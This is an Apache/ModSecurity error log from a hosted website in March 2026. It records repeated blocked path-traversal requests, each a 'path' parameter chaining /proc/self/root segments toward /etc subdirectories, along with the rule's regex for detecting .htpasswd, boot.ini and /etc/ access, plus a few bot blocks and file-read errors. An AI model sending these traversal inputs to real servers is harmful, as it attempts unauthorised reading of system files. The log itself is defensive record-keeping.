[Wed Mar 18 08:05:33.775082 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.241.31:54312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqG_UzinOy1jxa1j4f2oAAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:05:34.363251 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:53026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqG_vu8EFLIOrSqIpvpsgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:05:49.459136 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:58226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqHDOyqAr6etmhZHNqhRAAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:05:49.921518 2026] [mime_magic:error] [pid 15826:tid 140411540502272] (70014)End of file found: [client 216.73.216.191:50478] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:06:03.667157 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:59586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqHG0zinOy1jxa1j4f2tgAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:06:07.039671 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:43820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqHH8df6f5d65gmYZS4BwAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:06:17.240156 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:43826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqHKcdf6f5d65gmYZS4GwAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:07:35.247099 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:56672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqHd9Y0UrI5A3LftIyDCwAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:07:37.244631 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:39882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqHeew_le52K8_3pV3EhAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:07:54.260272 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.241.31:55932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqHiuw_le52K8_3pV3ErQAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:07:57.828513 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.244.43:39940] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqHjUzinOy1jxa1j4f3EAAAAQg"]
[Wed Mar 18 08:07:58.812311 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.228.61:43736] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqHjtY0UrI5A3LftIyDJAAAAZM"]
[Wed Mar 18 08:08:28.916333 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.243.128:46600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqHrOw_le52K8_3pV3E0wAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:08:31.568139 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.241.31:49598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqHrkzinOy1jxa1j4f3LwAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:08:39.135361 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:36282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqHt8df6f5d65gmYZS4jAAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:09:20.699240 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:33070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqH4NY0UrI5A3LftIyDkwAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:09:25.207575 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:45348] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqH5eyqAr6etmhZHNqiBwAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:09:44.441369 2026] [mime_magic:error] [pid 15826:tid 140411683178240] (70014)End of file found: [client 74.7.241.31:39382] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/lib
[Wed Mar 18 08:09:52.778119 2026] [mime_magic:error] [pid 11816:tid 140411582465792] (70014)End of file found: [client 57.141.18.104:59002] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:10:13.844800 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:55640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqIFcdf6f5d65gmYZS42QAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:11:04.259023 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.241.31:43316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqISOyqAr6etmhZHNqiXQAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:11:08.919970 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:46392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqITPu8EFLIOrSqIpvqnQAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:11:10.250915 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.241.31:41032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqITimAPhZkrhU8w4lSeQAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:11:19.703155 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:41044] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqIV-yqAr6etmhZHNqicQAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:11:52.103528 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:53030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqIeNY0UrI5A3LftIyEHwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:12:10.147753 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:46092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqIita6ubjKNq_cu4Z8_wAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
